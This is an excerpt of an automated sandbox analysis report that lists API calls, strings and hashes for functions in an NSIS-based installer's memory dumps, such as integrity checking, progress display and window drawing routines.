Associated: 00000009.00000002.1301005008174.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.1301005041252.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_99200032052824.jbxd

Similarity

API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
String ID: A
API String ID: 2624150263-3554254475
Opcode ID: cdde6bf5d860e80b1670e7dcdf7f51639cc8ffce7cf8acda1903fa5029e0e2f5
Instruction ID: e7408234a4186d1eb777f56003ea07db5a22e6c17a70b9954916109459a63af9
Opcode Fuzzy Hash: cdde6bf5d860e80b1670e7dcdf7f51639cc8ffce7cf8acda1903fa5029e0e2f5
Instruction Fuzzy Hash: EEA170B1900219ABDB11EFA6CD41AAF77B8EF85314F50843BF601B62D1DB7C89418B6D

Function 00402D63 Relevance: 17.7, APIs: 5, Strings: 5, Instructions: 182COMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 00402D74
GetModuleFileNameA.KERNEL32(00000000,00436C00,00000400), ref: 00402D90

Part of subcall function 00405B39: GetFileAttributesA.KERNEL32(00000003,00402DA3,00436C00,80000000,00000003), ref: 00405B3D
Part of subcall function 00405B39: CreateFileA.KERNEL32(?,?,?,00000000,?,00000001,00000000), ref: 00405B5F

GetFileSize.KERNEL32(00000000,00000000,00437000,00000000,00435C00,00435C00,00436C00,00436C00,80000000,00000003), ref: 00402DDC

Strings

Inst, xrefs: 00402E48
Null, xrefs: 00402E5A
soft, xrefs: 00402E51
Error launching installer, xrefs: 00402DB3
Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00402F3B

Memory Dump Source

Source File: 00000009.00000002.1301004938457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.1301004905973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.1301004973044.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.1301005008174.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.1301005041252.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_99200032052824.jbxd

Similarity

API ID: File$AttributesCountCreateModuleNameSizeTick
String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
API String ID: 4283519449-1074636621
Opcode ID: 0ada85f12cf01c90e965dc0c6425161c0b1bcf50f2fa52f3a00b6f97cbd218ea
Instruction ID: 2bf3385630e85dd4df9d7bf2b803376e12afffe2b97a8d7f9aa5fd2bd7c684e6
Opcode Fuzzy Hash: 0ada85f12cf01c90e965dc0c6425161c0b1bcf50f2fa52f3a00b6f97cbd218ea
Instruction Fuzzy Hash: BD51F571900214ABDB219F65DE89B9F7AB8EB14368F50403BF904B72D0C7BC9D458BAD

Function 00405FC2 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 199stringCOMMON

Download Yara Rule

APIs

GetSystemDirectoryA.KERNEL32(0042E3A0,00000400), ref: 004060ED
GetWindowsDirectoryA.KERNEL32(0042E3A0,00000400,?,0042A050,00000000,004050FF,0042A050,00000000), ref: 00406100
SHGetSpecialFolderLocation.SHELL32(004050FF,75A823A0,?,0042A050,00000000,004050FF,0042A050,00000000), ref: 0040613C
SHGetPathFromIDListA.SHELL32(75A823A0,0042E3A0), ref: 0040614A
CoTaskMemFree.OLE32(75A823A0), ref: 00406156
lstrcatA.KERNEL32(0042E3A0,\Microsoft\Internet Explorer\Quick Launch), ref: 0040617A
lstrlenA.KERNEL32(0042E3A0,?,0042A050,00000000,004050FF,0042A050,00000000,00000000,?,75A823A0), ref: 004061CC

Strings

\Microsoft\Internet Explorer\Quick Launch, xrefs: 00406174
Software\Microsoft\Windows\CurrentVersion, xrefs: 004060BC

Memory Dump Source

Source File: 00000009.00000002.1301004938457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.1301004905973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.1301004973044.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.1301005008174.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.1301005041252.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_99200032052824.jbxd

Similarity

API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
String ID: Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
API String ID: 717251189-730719616
Opcode ID: 51f7f20917835abc90d04fd7ead949147b631891de6bb8cdcea0e0046e261de2
Instruction ID: 67ab450255a0c50706d08a2588864b7c9a920b8361f3652e316ab2a1c483ee89
Opcode Fuzzy Hash: 51f7f20917835abc90d04fd7ead949147b631891de6bb8cdcea0e0046e261de2
Instruction Fuzzy Hash: C661E375900105AEDB209F24CD84BBF7BA4AB15314F52413FEA03BA2D2C67C8962CB5D

Function 00402F9C Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 166COMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 00403003
GetTickCount.KERNEL32 ref: 004030AA
MulDiv.KERNEL32(7FFFFFFF,00000064,00000020), ref: 004030D3
wsprintfA.USER32 ref: 004030E3

Strings

(TA, xrefs: 00403059
... %d%%, xrefs: 004030DD
(TA, xrefs: 0040315D

Memory Dump Source

Source File: 00000009.00000002.1301004938457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.1301004905973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.1301004973044.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.1301005008174.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.1301005041252.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_99200032052824.jbxd

Similarity

API ID: CountTick$wsprintf
String ID: (TA$(TA$... %d%%
API String ID: 551687249-2950751476
Opcode ID: a0691e7d4b1972c1c6b665dba6ae3b2a2bfd9af5d6c8964951a9ca70517b3b3f
Instruction ID: 5c281e24a88a3bae7ae2a550c5808c60fec2149314028a17d76778b6f2aa7d1b
Opcode Fuzzy Hash: a0691e7d4b1972c1c6b665dba6ae3b2a2bfd9af5d6c8964951a9ca70517b3b3f
Instruction Fuzzy Hash: BB518171900219DBDB00DF66DA4479E7BB8EF4875AF10453BE814BB2D0C7789E40CBA9

Function 004040A6 Relevance: 12.1, APIs: 8, Instructions: 68COMMON

Download Yara Rule

APIs

GetWindowLongA.USER32(?,000000EB), ref: 004040C3
GetSysColor.USER32(00000000), ref: 00404101
SetTextColor.GDI32(?,00000000), ref: 0040410D
SetBkMode.GDI32(?,?), ref: 00404119
GetSysColor.USER32(?), ref: 0040412C
SetBkColor.GDI32(?,?), ref: 0040413C
DeleteObject.GDI32(?), ref: 00404156
CreateBrushIndirect.GDI32(?), ref: 00404160

Memory Dump Source

Source File: 00000009.00000002.1301004938457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.1301004905973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.1301004973044.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.1301005008174.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.1301005041252.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_99200032052824.jbxd

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: 49e3bf83d30a7d96e63afb16dabbed360c02e673e0f4069f8acd1b63125549d3
Instruction ID: acf379a668eb7ba76ca74fd388386b38bd03efbb8d8a5887114ae3c25b447e5f
Opcode Fuzzy Hash: 49e3bf83d30a7d96e63afb16dabbed360c02e673e0f4069f8acd1b63125549d3
Instruction Fuzzy Hash: 122174715007049BCB309F78DD4CB5BBBF8AF91710B048A3EEA96A66E0D734D984CB54

Function 004050C7 Relevance: 10.6, APIs: 7, Instructions: 73stringwindowCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(0042A050,00000000,?,75A823A0,?,?,?,?,?,?,?,?,?,004030F7,00000000,?), ref: 00405100
lstrlenA.KERNEL32(004030F7,0042A050,00000000,?,75A823A0,?,?,?,?,?,?,?,?,?,004030F7,00000000), ref: 00405110
lstrcatA.KERNEL32(0042A050,004030F7,004030F7,0042A050,00000000,?,75A823A0), ref: 00405123
SetWindowTextA.USER32(0042A050,0042A050), ref: 00405135
SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040515B
SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00405175
SendMessageA.USER32(?,00001013,?,00000000), ref: 00405183

Memory Dump Source

Source File: 00000009.00000002.1301004938457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.1301004905973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.1301004973044.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.1301005008174.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.1301005041252.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_99200032052824.jbxd

Similarity

API ID: MessageSend$lstrlen$TextWindowlstrcat
String ID:
API String ID: 2531174081-0
Opcode ID: 57bc30585033a45ff0503b142d8cfa380acccc19d4d3abea87a767d6a2fe19a3
Instruction ID: 4d1d9eb5ffa78b07b8376cbf0c4e91ada4ce3c5a86d4cc872ddc87c593067670
Opcode Fuzzy Hash: 57bc30585033a45ff0503b142d8cfa380acccc19d4d3abea87a767d6a2fe19a3
Instruction Fuzzy Hash: 69214A71900518BADB119FA5CD84A9FBFA9EB09354F14807AF944AA291C7398E418F98

Function 00404992 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 004049AD
GetMessagePos.USER32 ref: 004049B5
ScreenToClient.USER32(?,?), ref: 004049CF
SendMessageA.USER32(?,00001111,00000000,?), ref: 004049E1
SendMessageA.USER32(?,0000110C,00000000,?), ref: 00404A07

Strings

f, xrefs: 004049E3

Memory Dump Source

Source File: 00000009.00000002.1301004938457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.1301004905973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.1301004973044.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.1301005008174.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.1301005041252.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_99200032052824.jbxd

Similarity

API ID: Message$Send$ClientScreen
String ID: f
API String ID: 41195575-1993550816
Opcode ID: 33c806690141bddee9d4868c528a06b643bfd418e36cfd9cd505f5ef0f9636f7
Instruction ID: 01adb620d992fda54c9cccfda8f446508f93e77e16c9618e278126a6ed05cf06
Opcode Fuzzy Hash: 33c806690141bddee9d4868c528a06b643bfd418e36cfd9cd505f5ef0f9636f7
Instruction Fuzzy Hash: 14015E75900219BAEB00DBA4DD85BFFBBBCAF55711F10412BBA50F61C0C7B499418BA4

Function 00402C7C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON

Download Yara Rule

APIs

SetTimer.USER32(?,?,000000FA,00000000), ref: 00402C97
MulDiv.KERNEL32(?,00000064,?), ref: 00402CC2
wsprintfA.USER32 ref: 00402CD2
SetWindowTextA.USER32(?,?), ref: 00402CE2
SetDlgItemTextA.USER32(?,00000406,?), ref: 00402CF4

Strings

verifying installer: %d%%, xrefs: 00402CCC

Memory Dump Source

Source File: 00000009.00000002.1301004938457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.1301004905973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.1301004973044.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.1301005008174.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.1301005041252.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_99200032052824.jbxd

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: verifying installer: %d%%
API String ID: 1451636040-82062127
Opcode ID: 9d09083b9960c0948bcad18999385935d4fa9c03e82c6b05e18ea1cbbf7ae53f
Instruction ID: 0a6faa1976aca28fcdfc9934e3507063152a2d7882a275f196f36718a2c25724
Opcode Fuzzy Hash: 9d09083b9960c0948bcad18999385935d4fa9c03e82c6b05e18ea1cbbf7ae53f
Instruction Fuzzy Hash: 8F014F7064020CFBEF249F61DD09EEE37A9AB04304F008039FA06B52D0DBB989558F58

Function 004062CA Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36libraryCOMMON

Download Yara Rule

APIs

GetSystemDirectoryA.KERNEL32(?,00000104), ref: 004062E1
wsprintfA.USER32 ref: 0040631A
LoadLibraryExA.KERNEL32(?,00000000,00000008), ref: 0040632E

Strings

%s%s.dll, xrefs: 00406314
\, xrefs: 004062F2
UXTHEME, xrefs: 004062D3

Memory Dump Source

Source File: 00000009.00000002.1301004938457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.1301004905973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.1301004973044.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.1301005008174.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.1301005041252.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_99200032052824.jbxd

Similarity

API ID: DirectoryLibraryLoadSystemwsprintf
String ID: %s%s.dll$UXTHEME$\
API String ID: 2200240437-4240819195
Opcode ID: 99878a05f639d6717cee7e73d8174e66263622090e4b33b6bcde024c159c7dc8
Instruction ID: 4b2e1b96e526c3afc1937c3159904a09e8452480974eeaf1dbd8ebd71d3b02b5
Opcode Fuzzy Hash: 99878a05f639d6717cee7e73d8174e66263622090e4b33b6bcde024c159c7dc8
Instruction Fuzzy Hash: 87F0F63050060AABEB14AB74DD0DFEB375CAB08305F14047AAA87E11C1EA78D9398B9C

Function 375F6E10 Relevance: 10.2, Strings: 8, Instructions: 229COMMON

Download Yara Rule

Strings

$q, xrefs: 375F6F12
$q, xrefs: 375F6F6D
$q, xrefs: 375F6F61
$q, xrefs: 375F6FC2
$q, xrefs: 375F6FCE
$q, xrefs: 375F6F06
$q, xrefs: 375F6F8C
$q, xrefs: 375F6F98

Memory Dump Source

Source File: 00000009.00000002.1301032596898.00000000375F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 375F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_375f0000_99200032052824.jbxd

Similarity

API ID:
String ID: $q$$q$$q$$q$$q$$q$$q$$q
API String ID: 0-3886557441
Opcode ID: 52685b3091568e86e0f6c50593274584095fac84fcf31587a9a943399d1471c0
Instruction ID: c1dbdb409d891810134887c78653c5a6b8cbfa777dfed9ab38e19594061aba0d
Opcode Fuzzy Hash: 52685b3091568e86e0f6c50593274584095fac84fcf31587a9a943399d1471c0
Instruction Fuzzy Hash: EA91AF34A0130ADFEB18DB64C951BAE77F6EF84350F60892AE401A7395DF769C46CB80

Function 0040273C Relevance: 9.1, APIs: 6, Instructions: 86memoryfileCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 00402790
GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,000000F0), ref: 004027AC
GlobalFree.KERNEL32(?), ref: 004027EB
GlobalFree.KERNEL32(00000000), ref: 004027FE
CloseHandle.KERNEL32(?,?,?,?,000000F0), ref: 00402816
DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,000000F0), ref: 0040282A

Memory Dump Source

Source File: 00000009.00000002.1301004938457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.1301004905973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.1301004973044.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.1301005008174.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.1301005041252.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_99200032052824.jbxd

Similarity

API ID: Global$AllocFree$CloseDeleteFileHandle
String ID:
API String ID: 2667972263-0
Opcode ID: d16b92c6e49c5f1eda150bd2065ff059c02a3c223b7b2492d8b40f99e43a7d67
Instruction ID: a22fe22bcc3eabd59056b14894fa73c1d09c67f360634fc0aee3e8da3dcac443
Opcode Fuzzy Hash: d16b92c6e49c5f1eda150bd2065ff059c02a3c223b7b2492d8b40f99e43a7d67
Instruction Fuzzy Hash: 72219F71800124BBDF217FA5DE49E9E7B79AF09364F14423AF510762E0CB7959019FA8

Function 0040620A Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 69COMMON

Download Yara Rule

APIs

CharNextA.USER32(?,*?|<>/":,00000000,00435000,75A83410,00436400,00000000,004031E7,00436400,00436400,0040341E,?,00000006,00000008,0000000A), ref: 00406262
CharNextA.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 0040626F
CharNextA.USER32(?,00435000,75A83410,00436400,00000000,004031E7,00436400,00436400,0040341E,?,00000006,00000008,0000000A), ref: 00406274
CharPrevA.USER32(?,?,75A83410,00436400,00000000,004031E7,00436400,00436400,0040341E,?,00000006,00000008,0000000A), ref: 00406284

Strings

*?|<>/":, xrefs: 00406252

Memory Dump Source

Source File: 00000009.00000002.1301004938457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.1301004905973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.1301004973044.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.1301005008174.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.1301005041252.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_99200032052824.jbxd

Similarity

API ID: Char$Next$Prev
String ID: *?|<>/":
API String ID: 589700163-165019052
Opcode ID: baaf8be525beb263cd2d66daa4244c7e43047c81ac15102dd5c23876bc89bcef
Instruction ID: 9cd3e807bb29f508aa56cad56700fba7970b0901ce3b2fdefae83793710aaee6
Opcode Fuzzy Hash: baaf8be525beb263cd2d66daa4244c7e43047c81ac15102dd5c23876bc89bcef
Instruction Fuzzy Hash: 1411E26180479129EB327A385C40BB76FD84F57764F1A04FFE8C6722C2C67C5C6292AE

Function 375F3148 Relevance: 7.9, Strings: 6, Instructions: 405COMMON

Download Yara Rule

Strings

$q, xrefs: 375F342B
$q, xrefs: 375F35E5
$q, xrefs: 375F365D
$q, xrefs: 375F3651
$q, xrefs: 375F3485
$q, xrefs: 375F3491

Memory Dump Source

Source File: 00000009.00000002.1301032596898.00000000375F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 375F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_375f0000_99200032052824.jbxd

Similarity

API ID:
String ID: $q$$q$$q$$q$$q$$q
API String ID: 0-2069967915
Opcode ID: 707af274724a6e70989fc1c57a11a9e5540bcae3dff40d567af5f72abf0f28c9
Instruction ID: 405717e218b630fcbfd3430ff0e13221dffd2e61269eb1400af21d1f89c9bd6f
Opcode Fuzzy Hash: 707af274724a6e70989fc1c57a11a9e5540bcae3dff40d567af5f72abf0f28c9
Instruction Fuzzy Hash: 54F14C34B01205DFEB19EBA4C594B5EB7B3BF98340F258529E405AB355DB76EC82CB80

Function 00401759 Relevance: 7.6, APIs: 5, Instructions: 147stringtimeCOMMON

Download Yara Rule

APIs

lstrcatA.KERNEL32(00000000,00000000,0040A418,00435800,00000000,00000000,00000031), ref: 00401798
CompareFileTime.KERNEL32(-00000014,?,0040A418,0040A418,00000000,00000000,0040A418,00435800,00000000,00000000,00000031), ref: 004017C2

Part of subcall function 00405FA0: lstrcpynA.KERNEL32(?,?,00000400,004032DE,0042EC00,NSIS Error,?,00000006,00000008,0000000A), ref: 00405FAD

Part of subcall function 004050C7: lstrlenA.KERNEL32(0042A050,00000000,?,75A823A0,?,?,?,?,?,?,?,?,?,004030F7,00000000,?), ref: 00405100
Part of subcall function 004050C7: lstrlenA.KERNEL32(004030F7,0042A050,00000000,?,75A823A0,?,?,?,?,?,?,?,?,?,004030F7,00000000), ref: 00405110
Part of subcall function 004050C7: lstrcatA.KERNEL32(0042A050,004030F7,004030F7,0042A050,00000000,?,75A823A0), ref: 00405123
Part of subcall function 004050C7: SetWindowTextA.USER32(0042A050,0042A050), ref: 00405135
Part of subcall function 004050C7: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040515B
Part of subcall function 004050C7: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00405175
Part of subcall function 004050C7: SendMessageA.USER32(?,00001013,?,00000000), ref: 00405183

Memory Dump Source

Source File: 00000009.00000002.1301004938457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.1301004905973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.1301004973044.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.1301005008174.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.1301005041252.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_99200032052824.jbxd

Similarity

API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
String ID:
API String ID: 1941528284-0
Opcode ID: ec066fc1f791a28a9f0325cd86f74f0af079f58842eee79025982aaa23838273
Instruction ID: 9917b4e32c30e3d06e99a245a18197bb2030eb542a9362b48aff858cdbf0b6bf
Opcode Fuzzy Hash: ec066fc1f791a28a9f0325cd86f74f0af079f58842eee79025982aaa23838273
Instruction Fuzzy Hash: C541A571A00515BACF107BA5CD45EAF3678EF45368F60823FF421F20E1D67C8A418AAE

Function 00401D9B Relevance: 7.5, APIs: 5, Instructions: 43COMMON

Download Yara Rule

APIs

GetDC.USER32(?), ref: 00401D9E
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401DB8
MulDiv.KERNEL32(00000000,00000000), ref: 00401DC0
ReleaseDC.USER32(?,00000000), ref: 00401DD1
CreateFontIndirectA.GDI32(0040B818), ref: 00401E20

Memory Dump Source

Source File: 00000009.00000002.1301004938457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.1301004905973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.1301004973044.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.1301005008174.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.1301005041252.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_99200032052824.jbxd

Similarity

API ID: CapsCreateDeviceFontIndirectRelease
String ID:
API String ID: 3808545654-0
Opcode ID: e66b643645ae5869d7f803f1a931f06999308b12a2e1552bce617188d2388566
Instruction ID: 674523e5e9bad331ced951479310ecf0af1814540c8bb9a1260b3d2be645706a
Opcode Fuzzy Hash: e66b643645ae5869d7f803f1a931f06999308b12a2e1552bce617188d2388566
Instruction Fuzzy Hash: 49017972944240AFD7006BB4AE5ABA93FF8DB59305F108439F141B61F2CB790445CF9D

Function 00401D41 Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?), ref: 00401D45
GetClientRect.USER32(00000000,?), ref: 00401D52
LoadImageA.USER32(?,00000000,?,?,?,?), ref: 00401D73
SendMessageA.USER32(00000000,00000172,?,00000000), ref: 00401D81
DeleteObject.GDI32(00000000), ref: 00401D90

Memory Dump Source

Source File: 00000009.00000002.1301004938457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.1301004905973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.1301004973044.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.1301005008174.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.1301005041252.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_99200032052824.jbxd

Similarity

API ID: ClientDeleteImageItemLoadMessageObjectRectSend
String ID:
API String ID: 1849352358-0
Opcode ID: 0eb514b26757c14dfc9e7ab691bd09cd0abb996a20804aaa0a787f0dfa13f32e
Instruction ID: 19d294cafef6034250738095af8a4c7efea52b5f5fc7e0a3d6f731340b14d26e
Opcode Fuzzy Hash: 0eb514b26757c14dfc9e7ab691bd09cd0abb996a20804aaa0a787f0dfa13f32e
Instruction Fuzzy Hash: EAF0ECB2600515AFDB00ABA4DE89DAFB7BCEB44305B04447AF641F2191CA748D018B38

Function 00401C0A Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C7A
SendMessageA.USER32(00000000,00000000,?,?), ref: 00401C92

Strings

!, xrefs: 00401C46

Memory Dump Source

Source File: 00000009.00000002.1301004938457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.1301004905973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.1301004973044.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.1301005008174.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.1301005041252.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_99200032052824.jbxd

Similarity

API ID: MessageSend$Timeout
String ID: !
API String ID: 1777923405-2657877971
Opcode ID: 2275f1e70b71c4697b0e54cdc90b5e9c4bcde2e16bf34abc03187d516991a544
Instruction ID: 6061c88af419790da573c0436b06ac7d5ed1a9fd9516c3c4f7c631bff8e6d743
Opcode Fuzzy Hash: 2275f1e70b71c4697b0e54cdc90b5e9c4bcde2e16bf34abc03187d516991a544
Instruction Fuzzy Hash: 2621A271E44209BEEF15DFA5D986AAE7BB4EF84304F24843EF501B61D0CB7885418F28

Function 00404888 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(0042A870,0042A870,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,004047A3,000000DF,00000000,00000400,?), ref: 00404926
wsprintfA.USER32 ref: 0040492E
SetDlgItemTextA.USER32(?,0042A870), ref: 00404941

Strings

%u.%u%s%s, xrefs: 00404910

Memory Dump Source

Source File: 00000009.00000002.1301004938457.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000009.00000002.1301004905973.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.1301004973044.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.1301005008174.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000009.00000002.1301005041252.0000000000441000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_400000_99200032052824.jbxd

Similarity

API ID: ItemTextlstrlenwsprintf
String ID: %u.%u%s%s
API String ID: 3540041739-3551169577
